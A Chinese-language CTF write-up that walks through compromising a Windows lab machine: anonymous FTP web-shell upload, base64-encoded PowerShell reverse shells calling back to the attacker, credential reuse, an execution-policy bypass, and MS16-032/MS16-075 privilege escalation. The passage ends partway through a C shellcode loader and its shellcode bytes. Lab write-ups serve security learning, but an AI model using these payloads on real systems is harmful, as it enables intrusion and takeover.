Fatec Ourinhos CTF 2018——Writeup

李白 Web安全 2018年11月23日发布
Favorite收藏

导语:本文是一篇关于Fatec Ourinhos CTF 2018第2版挑战赛的write-up,我将详细的阐述如何拿到Kraken这台机器flag。

介绍

本文是一篇关于Fatec Ourinhos CTF 20182版挑战赛的write-up,我将详细的阐述如何拿到Kraken这台机器flag

机器的原名是Kraken,是我在2017年为我的团队WATCHERS搭建的个人渗透测试实验室的一部分。

挑战信息

· 名称:Unleash the Kraken

· 我们的目标IP地址是192.168.56.100,域名是kraken.wtc

· 操作系统:Windows

枚举扫描阶段

Nmap向我们显示了以下输出内容:

[root:~] nmap 192.168.56.100 -Pn -sT
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-16 14:22 PDT
Nmap scan report for 192.168.56.100
Host is up, received user-set (0.10s latency).
Not shown: 990 filtered ports
Reason: 990 no-responses
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       REASON
21/tcp    open  ftp           syn-ack
80/tcp    open  http          syn-ack
135/tcp   open  msrpc         syn-ack
443/tcp   open  https         syn-ack
1723/tcp  open  pptp          syn-ack
3389/tcp  open  ms-wbt-server syn-ack
49153/tcp open  unknown       syn-ack
49154/tcp open  unknown       syn-ack
49156/tcp open  unknown       syn-ack
49157/tcp open  unknown       syn-ack
Nmap done: 1 IP address (1 host up) scanned in 10.73 seconds

很明显,我们有一个网站和一个FTP服务器需要渗透测试。其他的服务都需要凭证,但我们没有凭证信息。

这个网站的页面是一张海妖(kraken)”的图片,如下图所示:

image.png 

让我们启动一个cURL请求http的服务端口,看看我们能得到了什么信息:

[root:~] curl http://192.168.56.100 
<html>
<body>
<div align="center">
<h1>Release the kraken!</h1>
<img src="kraken-pic.jpg"/>
</div>
<!-- Username: DavyJones -->
<!-- Password: #kr4kud0o0O -->
</body>
</html>

从网页源码中我们拿到了凭证。尝试登陆FTP(端口21)服务并没有成功,尝试登录RDP(端口3389)服务同样失败了!

漏洞分析

现在,我尝试通过匿名账户(anonymous)登录FTP竟然成功了!

[root:~] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,359,065,088 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
05-17-2018  01:08PM       <DIR>          kraken
05-17-2018  02:01PM       <DIR>          uploads
05-17-2018  01:08PM       <DIR>          App_Data
05-17-2018  11:26AM                  189 index.html
05-17-2018  11:21AM                53404 kraken-pic.jpg
226-Directory has 49,359,065,088 bytes of disk space available.
226 Transfer complete.
ftp>

我们可以通过FTP的匿名账户访问到Web根目录,让我们尝试上传文件。

[root:/tmp] echo 'andre' >> file.txt
[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,354,731,520 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
550 Access is denied. 
ftp>

我们没有权限上传文件。但也许另一个文件夹可以? uploads这个文件夹本身就是接收文件的,应该是有权限的!

ftp> cd uploads
250 CWD command successful.
ftp> put file.txt
local: file.txt remote: file.txt
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
7 bytes sent in 0.00 secs (175.2805 kB/s)
ftp> exit
221 Goodbye.
[root:/tmp] curl http://192.168.56.100/uploads/file.txt
andre
[root:/tmp]

漏洞利用

现在我们知道了一种上传任意文件的方法,并且我们可以使用浏览器访问上传的文件。那么,现在就只是上传个Web shell的问题了,因此我们可以在Kraken主机上获得一个shell

[root:/tmp] cp /usr/share/webshells/aspx/cmdasp.aspx .
[root:/tmp] ftp 192.168.56.100
Connected to 192.168.56.100.
220 Microsoft FTP Service
Name (192.168.56.100:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230-Directory has 49,345,097,728 bytes of disk space available.
230 User logged in.
Remote system type is Windows_NT.
ftp> cd uploads
250 CWD command successful.
ftp> put cmdasp.aspx
local: cmdasp.aspx remote: cmdasp.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
1442 bytes sent in 0.00 secs (42.9749 MB/s)

现在使用Web浏览器访问Webshell并发送命令!

拿到主机权限

为了获得一个shell,我使用了我编写的反向shell生成器工具shellpop来帮助我拿到主机的系统shell,如下所示:

[root:/tmp] shellpop --payload windows/reverse/tcp/powershell -H tun0 -P 443 
[+] Execute this code in remote target: 
powershell.exe -nop -ep bypass -Command "$cFYlLK='10.11.12.26';$BfKleTWqoeSd=443;$czOaNBi=New-Object System.Net.Sockets.TCPClient($cFYlLK,$BfKleTWqoeSd);$QHFXyM=$czOaNBi.GetStream();[byte[]]$xdjeYJjrFCJTTT=0..65535|%{0};$tBoRkCjv=([text.encoding]::ASCII).GetBytes('PS '+(Get-Location).Path+'> ');$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);while(($LOlZmTcyLFlYNih=$QHFXyM.Read($xdjeYJjrFCJTTT,0,$xdjeYJjrFCJTTT.Length)) -ne 0){$qLUSJN=([text.encoding]::ASCII).GetString($xdjeYJjrFCJTTT,0,$LOlZmTcyLFlYNih);try{$yWMBwfso=(Invoke-Expression -c $qLUSJN 2>&1|Out-String)}catch{Write-Warning 'Something went wrong with execution of command on the target.';Write-Error $_;};$cFYlLK0=$yWMBwfso+'PS '+(Get-Location).Path+'> ';$cFYlLK1=($cFYlLK2[0]|Out-String);$cFYlLK2.clear();$cFYlLK0=$cFYlLK0+$cFYlLK1;$tBoRkCjv=([text.encoding]::ASCII).GetBytes($cFYlLK0);$QHFXyM.Write($tBoRkCjv,0,$tBoRkCjv.Length);$QHFXyM.Flush();};$czOaNBi.Close();if($cFYlLK3){$cFYlLK3.Stop();};" 
[+] This shell DOES NOT have a handler set.
[root:/tmp]# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49244.
PS C:\windows\system32\inetsrv>

现在我们已经拿到了系统shell的权限。在此计算机中有多种方法可以拿到SYSTEM权限,但这适用于权限提升阶段。

特权提升

如果你在系统信息枚举阶段多花一点时间,你很快就会发现这台机器缺少很多补丁程序。

PS C:\windows\system32\inetsrv> Get-Hotfix | Where-Object { $_.Description -eq "Security Update" } 
Source        Description      HotFixID      InstalledBy          InstalledOn  
------        -----------      --------      -----------          -----------  
KRAKEN        Security Update  KB2479943                          6/15/2015 ...
KRAKEN        Security Update  KB2491683                          6/15/2015 ...
KRAKEN        Security Update  KB2506212                          6/15/2015 ...
KRAKEN        Security Update  KB2509553                          6/15/2015 ...
KRAKEN        Security Update  KB2511455                          6/15/2015 ...
KRAKEN        Security Update  KB2525835                          6/15/2015 ...
KRAKEN        Security Update  KB2536275                          6/15/2015 ...
KRAKEN        Security Update  KB2536276                          6/15/2015 ...
KRAKEN        Security Update  KB2544893                          6/15/2015 ...
KRAKEN        Security Update  KB2560656                          6/15/2015 ...
KRAKEN        Security Update  KB2564958                          6/15/2015 ...
KRAKEN        Security Update  KB2570947                          6/15/2015 ...
KRAKEN        Security Update  KB2585542                          6/15/2015 ...
KRAKEN        Security Update  KB2604115                          6/15/2015 ...
KRAKEN        Security Update  KB2620704                          6/15/2015 ...
KRAKEN        Security Update  KB2621440                          6/15/2015 ...
KRAKEN        Security Update  KB2631813                          6/15/2015 ...
KRAKEN        Security Update  KB2643719                          6/15/2015 ...
KRAKEN        Security Update  KB2654428                          6/15/2015 ...
KRAKEN        Security Update  KB2667402                          6/15/2015 ...
KRAKEN        Security Update  KB2676562                          6/15/2015 ...
KRAKEN        Security Update  KB2690533                          6/15/2015 ...
KRAKEN        Security Update  KB2698365                          6/15/2015 ...
KRAKEN        Security Update  KB2705219                          6/15/2015 ...
KRAKEN        Security Update  KB2712808                          6/15/2015 ...
KRAKEN        Security Update  KB2727528                          6/15/2015 ...
KRAKEN        Security Update  KB2736422                          6/15/2015 ...
KRAKEN        Security Update  KB2742599                          6/15/2015 ...
KRAKEN        Security Update  KB2765809     KRAKEN\Administrator 6/15/2015 ...
KRAKEN        Security Update  KB2770660                          6/15/2015 ...
KRAKEN        Security Update  KB2807986                          6/15/2015 ...
KRAKEN        Security Update  KB2813347                          6/15/2015 ...
KRAKEN        Security Update  KB2813430                          6/15/2015 ...
KRAKEN        Security Update  KB2832414                          6/15/2015 ...
KRAKEN        Security Update  KB2835361                          6/15/2015 ...
KRAKEN        Security Update  KB2839894                          6/15/2015 ...
KRAKEN        Security Update  KB2840631                          6/15/2015 ...
KRAKEN        Security Update  KB2847927                          6/15/2015 ...
KRAKEN        Security Update  KB2861191                          6/15/2015 ...
KRAKEN        Security Update  KB2861698                          6/15/2015 ...
KRAKEN        Security Update  KB2862152                          6/15/2015 ...
KRAKEN        Security Update  KB2862330                          6/15/2015 ...
KRAKEN        Security Update  KB2862335                          6/15/2015 ...
KRAKEN        Security Update  KB2862973                          6/15/2015 ...
KRAKEN        Security Update  KB2864058                          6/15/2015 ...
KRAKEN        Security Update  KB2864202                          6/15/2015 ...
KRAKEN        Security Update  KB2868038                          6/15/2015 ...
KRAKEN        Security Update  KB2871997                          6/15/2015 ...
KRAKEN        Security Update  KB2872339                          6/15/2015 ...
KRAKEN        Security Update  KB2884256                          6/15/2015 ...
KRAKEN        Security Update  KB2887069                          6/15/2015 ...
KRAKEN        Security Update  KB2892074                          6/15/2015 ...
KRAKEN        Security Update  KB2893294                          6/15/2015 ...
KRAKEN        Security Update  KB2894844                          6/15/2015 ...
KRAKEN        Security Update  KB2898851                          6/15/2015 ...
KRAKEN        Security Update  KB2900986                          6/15/2015 ...
KRAKEN        Security Update  KB2911501                          6/15/2015 ...
KRAKEN        Security Update  KB2912390                          6/15/2015 ...
KRAKEN        Security Update  KB2918614                          6/15/2015 ...
KRAKEN        Security Update  KB2922229                          6/15/2015 ...
KRAKEN        Security Update  KB2923392                          6/15/2015 ...
KRAKEN        Security Update  KB2931356                          6/15/2015 ...
KRAKEN        Security Update  KB2937610                          6/15/2015 ...
KRAKEN        Security Update  KB2939576                          6/15/2015 ...
KRAKEN        Security Update  KB2943357                          6/15/2015 ...
KRAKEN        Security Update  KB2957189                          6/15/2015 ...
KRAKEN        Security Update  KB2957503                          6/15/2015 ...
KRAKEN        Security Update  KB2957509                          6/15/2015 ...
KRAKEN        Security Update  KB2961072                          6/15/2015 ...
KRAKEN        Security Update  KB2968294                          6/15/2015 ...
KRAKEN        Security Update  KB2971850                          6/15/2015 ...
KRAKEN        Security Update  KB2972100                          6/15/2015 ...
KRAKEN        Security Update  KB2972211                          6/15/2015 ...
KRAKEN        Security Update  KB2972280                          6/15/2015 ...
KRAKEN        Security Update  KB2973112                          6/15/2015 ...
KRAKEN        Security Update  KB2973201                          6/15/2015 ...
KRAKEN        Security Update  KB2973351                          6/15/2015 ...
KRAKEN        Security Update  KB2976627                          6/15/2015 ...
KRAKEN        Security Update  KB2976897                          6/15/2015 ...
KRAKEN        Security Update  KB2977292                          6/15/2015 ...
KRAKEN        Security Update  KB2978120                          6/15/2015 ...
KRAKEN        Security Update  KB2978668                          6/15/2015 ...
KRAKEN        Security Update  KB2979570                          6/15/2015 ...
KRAKEN        Security Update  KB2984972                          6/15/2015 ...
KRAKEN        Security Update  KB2991963                          6/15/2015 ...
KRAKEN        Security Update  KB2992611                          6/15/2015 ...
KRAKEN        Security Update  KB2993958                          6/15/2015 ...
KRAKEN        Security Update  KB3002657     KRAKEN\Administrator 6/15/2015 ...
KRAKEN        Security Update  KB3003743                          6/15/2015 ...
KRAKEN        Security Update  KB3004361                          6/15/2015 ...
KRAKEN        Security Update  KB3004375                          6/15/2015 ...
KRAKEN        Security Update  KB3008923                          6/15/2015 ...
KRAKEN        Security Update  KB3010788                          6/15/2015 ...
KRAKEN        Security Update  KB3011780                          6/15/2015 ...
KRAKEN        Security Update  KB3014029     KRAKEN\Administrator 6/15/2015 ...
KRAKEN        Security Update  KB3019215                          6/15/2015 ...
KRAKEN        Security Update  KB3020388                          6/15/2015 ...
KRAKEN        Security Update  KB3021674                          6/15/2015 ...
KRAKEN        Security Update  KB3021952                          6/15/2015 ...
KRAKEN        Security Update  KB3022777                          6/15/2015 ...
KRAKEN        Security Update  KB3023215                          6/15/2015 ...
KRAKEN        Security Update  KB3030377                          6/15/2015 ...
KRAKEN        Security Update  KB3032323                          6/15/2015 ...
KRAKEN        Security Update  KB3032359                          6/15/2015 ...
KRAKEN        Security Update  KB3032655                          6/15/2015 ...
KRAKEN        Security Update  KB3033889                          6/15/2015 ...
KRAKEN        Security Update  KB3033929                          6/15/2015 ...
KRAKEN        Security Update  KB3034344                          6/15/2015 ...
KRAKEN        Security Update  KB3035126                          6/15/2015 ...
KRAKEN        Security Update  KB3035132                          6/15/2015 ...
KRAKEN        Security Update  KB3037574                          6/15/2015 ...
KRAKEN        Security Update  KB3039066                          6/15/2015 ...
KRAKEN        Security Update  KB3042553                          6/15/2015 ...
KRAKEN        Security Update  KB3045171                          6/15/2015 ...
KRAKEN        Security Update  KB3045685                          6/15/2015 ...
KRAKEN        Security Update  KB3045999                          6/15/2015 ...
KRAKEN        Security Update  KB3046002                          6/15/2015 ...
KRAKEN        Security Update  KB3046049                          6/15/2015 ...
KRAKEN        Security Update  KB3046269                          6/15/2015 ...
KRAKEN        Security Update  KB3046306                          6/15/2015 ...
KRAKEN        Security Update  KB3046482                          6/15/2015 ...
KRAKEN        Security Update  KB3048070                          6/15/2015 ...
KRAKEN        Security Update  KB3049563                          6/15/2015 ...
KRAKEN        Security Update  KB3051768                          6/15/2015 ...
KRAKEN        Security Update  KB3055642                          6/15/2015 ...
KRAKEN        Security Update  KB3057839                          6/15/2015 ...
KRAKEN        Security Update  KB3058515                          6/15/2015 ...
KRAKEN        Security Update  KB3059317                          6/15/2015 ...
KRAKEN        Security Update  KB3061518                          6/15/2015 ...
KRAKEN        Security Update  KB3063858                          6/15/2015 ...
PS C:\windows\system32\inetsrv>

它的最后一个修补程序是KB 3063858!多么老的补丁程序了。现在我们可以使用多个Exp将权限提升到SYSTEM。如:

· MS16-032

· MS16-075

这两个Exp都可以使用,并证明都可以成功提权。接下来,我将详细介绍如何利用每一个Exp进行提权。

MS16-032

此漏洞发生在多核(重要细节)Windows计算机中的竞争条件,允许攻击者获得SYSTEM权限。

你可以在这里获取到这个Exppowershell版本。

还有一个细节要注意,我们不能在Session 0中使用这个Exp。什么是session 0?你可以在此链接中获得有关session0的更多信息。

在了解了Session 0之后,你需要明白我们必须要在Windows中使用交互式会话来利用此漏洞。

我们可以通过远程桌面来实现交互式会话,这台主机开放了3389,但我们无法使用我们在之前的网页中找到的凭证登录3389

image.png

那么让我们列一下服务器上的用户吧。

image.png 

所以有两个用户,DavyJones(我们知道密码)和JackSparrow(我们不知道密码)。我们现在查看一下这两个用户的用户组。

 image.png

DavyJones是一个普通的用户。看起来不是那么酷。那JackSparrow怎么样呢?

 image.png

现在我们知道JackSparrow用户具有登录远程桌面的权限,如果通过这个帐户登录3389,我们就可以使用MS16-032提权到SYSTEM,让我们尝试使用DavyJones用户的凭证并使用PowerShell浏览DavyJones用户的文件。

使用以下PowerShell命令,我们就可以通过Web shellDavyJones用户的身份执行命令:

powershell -nop -ep bypass -command $u='KRAKEN\DavyJones';$p='#kr4kud0o0O';$c=convertTo-SecureString -AsPlainText -Force $p;$c=new-object system.management.automation.pscredential($u,$c);Invoke-Command -ComputerName 127.0.0.1 -Credential $c -ScriptBlock { whoami}

image.png

现在,我们可以尝试获取DavyJones这个用户的反向shell,使用Shellpop我们很容易就搞定了。

要使用我的工具生成干净的反向 tcp powershell命令,可以使用下面的语句:

[root:/tmp] shellpop --payload windows/reverse/tcp/powershell -H tun0 -P 443 --base64
[+] Execute this code in remote target: 
powershell.exe -nop -ep bypass -Encoded JABLAFUAVwB1AEsASgB1AD0AJwAxADAALgAxADEALgAxADIALgAxADQAJwA7ACQATgBuAGkASgBjAHUAWABqAE8AegBMAG0APQA0ADQAMwA7ACQASQBDAGEAQQB3AEYATwBkAEQAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACQASwBVAFcAdQBLAEoAdQAsACQATgBuAGkASgBjAHUAWABqAE8AegBMAG0AKQA7ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgAPQAkAEkAQwBhAEEAdwBGAE8AZABEAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYQBPAFUATgBRAFoAWgByAFkAcABEAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7ACQAdgBPAGQAZQBoAGYATwBVAHYAcgBaAEoAPQAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACcAUABTACAAJwArACgARwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AKQAuAFAAYQB0AGgAKwAnAD4AIAAnACkAOwAkAEcARQBrAFoAawBWAFQAWABUAFMAeQBIAC4AVwByAGkAdABlACgAJAB2AE8AZABlAGgAZgBPAFUAdgByAFoASgAsADAALAAkAHYATwBkAGUAaABmAE8AVQB2AHIAWgBKAC4ATABlAG4AZwB0AGgAKQA7AHcAaABpAGwAZQAoACgAJABiAGcATgBSAG8AVwA9ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgALgBSAGUAYQBkACgAJABhAE8AVQBOAFEAWgBaAHIAWQBwAEQALAAwACwAJABhAE8AVQBOAFEAWgBaAHIAWQBwAEQALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ACQAeABxAEQAcwBLAHYAagB0AHAAZwBpAFAARAA9ACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGEATwBVAE4AUQBaAFoAcgBZAHAARAAsADAALAAkAGIAZwBOAFIAbwBXACkAOwB0AHIAeQB7ACQARABZAE8ATgByAEYARgBPAD0AKABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAIAAkAHgAcQBEAHMASwB2AGoAdABwAGcAaQBQAEQAIAAyAD4AJgAxAHwATwB1AHQALQBTAHQAcgBpAG4AZwApAH0AYwBhAHQAYwBoAHsAVwByAGkAdABlAC0AVwBhAHIAbgBpAG4AZwAgACcAUwBvAG0AZQB0AGgAaQBuAGcAIAB3AGUAbgB0ACAAdwByAG8AbgBnACAAdwBpAHQAaAAgAGUAeABlAGMAdQB0AGkAbwBuACAAbwBmACAAYwBvAG0AbQBhAG4AZAAgAG8AbgAgAHQAaABlACAAdABhAHIAZwBlAHQALgAnADsAVwByAGkAdABlAC0ARQByAHIAbwByACAAJABfADsAfQA7ACQASwBVAFcAdQBLAEoAdQAwAD0AJABEAFkATwBOAHIARgBGAE8AKwAnAFAAUwAgACcAKwAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACkALgBQAGEAdABoACsAJwA+ACAAJwA7ACQASwBVAFcAdQBLAEoAdQAxAD0AKAAkAEsAVQBXAHUASwBKAHUAMgBbADAAXQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQASwBVAFcAdQBLAEoAdQAyAC4AYwBsAGUAYQByACgAKQA7ACQASwBVAFcAdQBLAEoAdQAwAD0AJABLAFUAVwB1AEsASgB1ADAAKwAkAEsAVQBXAHUASwBKAHUAMQA7ACQAdgBPAGQAZQBoAGYATwBVAHYAcgBaAEoAPQAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQASwBVAFcAdQBLAEoAdQAwACkAOwAkAEcARQBrAFoAawBWAFQAWABUAFMAeQBIAC4AVwByAGkAdABlACgAJAB2AE8AZABlAGgAZgBPAFUAdgByAFoASgAsADAALAAkAHYATwBkAGUAaABmAE8AVQB2AHIAWgBKAC4ATABlAG4AZwB0AGgAKQA7ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgALgBGAGwAdQBzAGgAKAApADsAfQA7ACQASQBDAGEAQQB3AEYATwBkAEQALgBDAGwAbwBzAGUAKAApADsAaQBmACgAJABLAFUAVwB1AEsASgB1ADMAKQB7ACQASwBVAFcAdQBLAEoAdQAzAC4AUwB0AG8AcAAoACkAOwB9ADsAIAA=
[+] This shell DOES NOT have a handler set.

我们最终需要在webshell上执行的命令为:

powershell -nop -ep bypass -command $u='KRAKEN\DavyJones';$p='#kr4kud0o0O';$c=convertTo-SecureString -AsPlainText -Force $p;$c=new-object system.management.automation.pscredential($u,$c);Invoke-Command -ComputerName 127.0.0.1 -Credential $c -ScriptBlock { powershell.exe -nop -ep bypass -Encoded JABLAFUAVwB1AEsASgB1AD0AJwAxADAALgAxADEALgAxADIALgAxADQAJwA7ACQATgBuAGkASgBjAHUAWABqAE8AegBMAG0APQA0ADQAMwA7ACQASQBDAGEAQQB3AEYATwBkAEQAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACQASwBVAFcAdQBLAEoAdQAsACQATgBuAGkASgBjAHUAWABqAE8AegBMAG0AKQA7ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgAPQAkAEkAQwBhAEEAdwBGAE8AZABEAC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYQBPAFUATgBRAFoAWgByAFkAcABEAD0AMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7ACQAdgBPAGQAZQBoAGYATwBVAHYAcgBaAEoAPQAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACcAUABTACAAJwArACgARwBlAHQALQBMAG8AYwBhAHQAaQBvAG4AKQAuAFAAYQB0AGgAKwAnAD4AIAAnACkAOwAkAEcARQBrAFoAawBWAFQAWABUAFMAeQBIAC4AVwByAGkAdABlACgAJAB2AE8AZABlAGgAZgBPAFUAdgByAFoASgAsADAALAAkAHYATwBkAGUAaABmAE8AVQB2AHIAWgBKAC4ATABlAG4AZwB0AGgAKQA7AHcAaABpAGwAZQAoACgAJABiAGcATgBSAG8AVwA9ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgALgBSAGUAYQBkACgAJABhAE8AVQBOAFEAWgBaAHIAWQBwAEQALAAwACwAJABhAE8AVQBOAFEAWgBaAHIAWQBwAEQALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ACQAeABxAEQAcwBLAHYAagB0AHAAZwBpAFAARAA9ACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGEATwBVAE4AUQBaAFoAcgBZAHAARAAsADAALAAkAGIAZwBOAFIAbwBXACkAOwB0AHIAeQB7ACQARABZAE8ATgByAEYARgBPAD0AKABJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAIAAkAHgAcQBEAHMASwB2AGoAdABwAGcAaQBQAEQAIAAyAD4AJgAxAHwATwB1AHQALQBTAHQAcgBpAG4AZwApAH0AYwBhAHQAYwBoAHsAVwByAGkAdABlAC0AVwBhAHIAbgBpAG4AZwAgACcAUwBvAG0AZQB0AGgAaQBuAGcAIAB3AGUAbgB0ACAAdwByAG8AbgBnACAAdwBpAHQAaAAgAGUAeABlAGMAdQB0AGkAbwBuACAAbwBmACAAYwBvAG0AbQBhAG4AZAAgAG8AbgAgAHQAaABlACAAdABhAHIAZwBlAHQALgAnADsAVwByAGkAdABlAC0ARQByAHIAbwByACAAJABfADsAfQA7ACQASwBVAFcAdQBLAEoAdQAwAD0AJABEAFkATwBOAHIARgBGAE8AKwAnAFAAUwAgACcAKwAoAEcAZQB0AC0ATABvAGMAYQB0AGkAbwBuACkALgBQAGEAdABoACsAJwA+ACAAJwA7ACQASwBVAFcAdQBLAEoAdQAxAD0AKAAkAEsAVQBXAHUASwBKAHUAMgBbADAAXQB8AE8AdQB0AC0AUwB0AHIAaQBuAGcAKQA7ACQASwBVAFcAdQBLAEoAdQAyAC4AYwBsAGUAYQByACgAKQA7ACQASwBVAFcAdQBLAEoAdQAwAD0AJABLAFUAVwB1AEsASgB1ADAAKwAkAEsAVQBXAHUASwBKAHUAMQA7ACQAdgBPAGQAZQBoAGYATwBVAHYAcgBaAEoAPQAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQASwBVAFcAdQBLAEoAdQAwACkAOwAkAEcARQBrAFoAawBWAFQAWABUAFMAeQBIAC4AVwByAGkAdABlACgAJAB2AE8AZABlAGgAZgBPAFUAdgByAFoASgAsADAALAAkAHYATwBkAGUAaABmAE8AVQB2AHIAWgBKAC4ATABlAG4AZwB0AGgAKQA7ACQARwBFAGsAWgBrAFYAVABYAFQAUwB5AEgALgBGAGwAdQBzAGgAKAApADsAfQA7ACQASQBDAGEAQQB3AEYATwBkAEQALgBDAGwAbwBzAGUAKAApADsAaQBmACgAJABLAFUAVwB1AEsASgB1ADMAKQB7ACQASwBVAFcAdQBLAEoAdQAzAC4AUwB0AG8AcAAoACkAOwB9ADsAIAA=}

然后我们就获得了DavyJones用户的反向shell

 image.png

我们很快就从davy jones的文档文件夹中找到了文本文件中存储的Jack Sparrow密码。

 image.png

使用以下命令可以访问RDP并获得交互式会话!

[root:/tmp] rdesktop -u 'JackSparrow' -p 'sp4rr0w_rul3z' 192.168.56.100

使用RDP登录后,下一步是下载漏洞利用脚本,但很快我们就会发现脚本的执行被禁用了,请参见下图。

 image.png

要绕过此限制,我们可以使用以下PowerShell命令:

Set-ExecutionPolicy -Scope CurrentUser Bypass

禁用此功能后,我们可以运行脚本并将我们的权限提升到SYSTEM

image.png 

MS16-075

这个漏洞存在于一个Windows服务帐户中,该账户具有SeImpersonatePrvilege特权,并能够触发Windows NT内核中会泄漏SYSTEM令牌的Bug,并且由于我们的用户有SeImpersonatePrivilege特权,所以我们能够嗅探令牌并模仿我们自己的SYSTEM ,然后进行特权提升。

Windows IISSQL服务器具有此类权限的服务帐户,因此如果我们有IISSQL服务器的shell并且服务器缺少MS16-075补丁程序,那么我们就可以利用这个Exp

为了利用这个漏洞,我使用了Rotten Potato这个工具。我们需要一个MSF meterpreter会话。为此,我选择使用自定义C代码将shellcode注入远程进程。

int main()
{
SIZE_T szShellcode = 476;
BYTE shellcode[] = { 
0xbd,0x82,0xcd,0xe3,0x7c,0xdb,0xda,0xd9,0x74,0x24,0xf4,0x58,0x31,0xc9,0xb1,
0x71,0x83,0xe8,0xfc,0x31,0x68,0x0f,0x03,0x68,0x8d,0x2f,0x16,0x80,0xd9,0x2c,
0x3d,0x89,0x31,0xfe,0xbe,0x6a,0xc1,0xbe,0xef,0x2b,0x91,0x12,0x41,0xfa,0x59,
0xa2,0xb3,0x67,0x11,0x4f,0x61,0x08,0xe9,0xc4,0xd4,0xd0,0xa1,0x51,0x8a,0xc0,
0x79,0xed,0x59,0x51,0x31,0xfe,0x2a,0x1b,0x8b,0x4d,0x64,0x55,0x43,0x7f,0x46,
0xc9,0x6f,0x1e,0x3a,0x10,0xa3,0xc0,0x83,0xd5,0x72,0x0d,0x45,0xd7,0x45,0xec,
0xa8,0x85,0x04,0xa0,0x7a,0xa1,0xd4,0x62,0xf0,0xf7,0xe4,0x2a,0x07,0x28,0x72,
0x2a,0x7f,0xd0,0x71,0x2e,0x8f,0x65,0xf7,0x2e,0x8f,0x65,0x7c,0xae,0x07,0x65,
0x82,0xaf,0x5f,0xe3,0x42,0xdb,0x38,0xa3,0x43,0xf4,0x97,0xb8,0x0b,0xec,0x53,
0x34,0xcb,0x2c,0x15,0x4b,0x1b,0xcf,0xf3,0x03,0x64,0xd9,0xbd,0x18,0xae,0x52,
0x75,0x1e,0x18,0x2f,0xb7,0xe9,0xec,0x81,0x77,0x45,0xad,0x20,0xbe,0x9b,0x6c,
0xa2,0x80,0x9c,0x8e,0xd1,0xf3,0x91,0x4d,0x56,0xd0,0x21,0x14,0x5f,0xc9,0x47,
0x4e,0xc7,0xad,0x2c,0x2e,0xdc,0x64,0x32,0x7e,0x7a,0x36,0xbf,0x72,0xcb,0xfc,
0x34,0xca,0xd7,0xb5,0x4b,0x1a,0xa6,0xce,0x48,0x12,0x61,0xd0,0x80,0x63,0x2a,
0x93,0x78,0x3d,0x93,0x49,0x38,0x99,0x62,0x37,0xfb,0x43,0x2d,0x44,0x17,0x53,
0xec,0x18,0x17,0x73,0xb6,0xdd,0xbe,0x29,0x0f,0x55,0x52,0x24,0xc4,0x96,0xac,
0x49,0x86,0x21,0xed,0xc2,0x4a,0x80,0x4e,0x1f,0x9f,0xe4,0x70,0x1e,0x89,0xad,
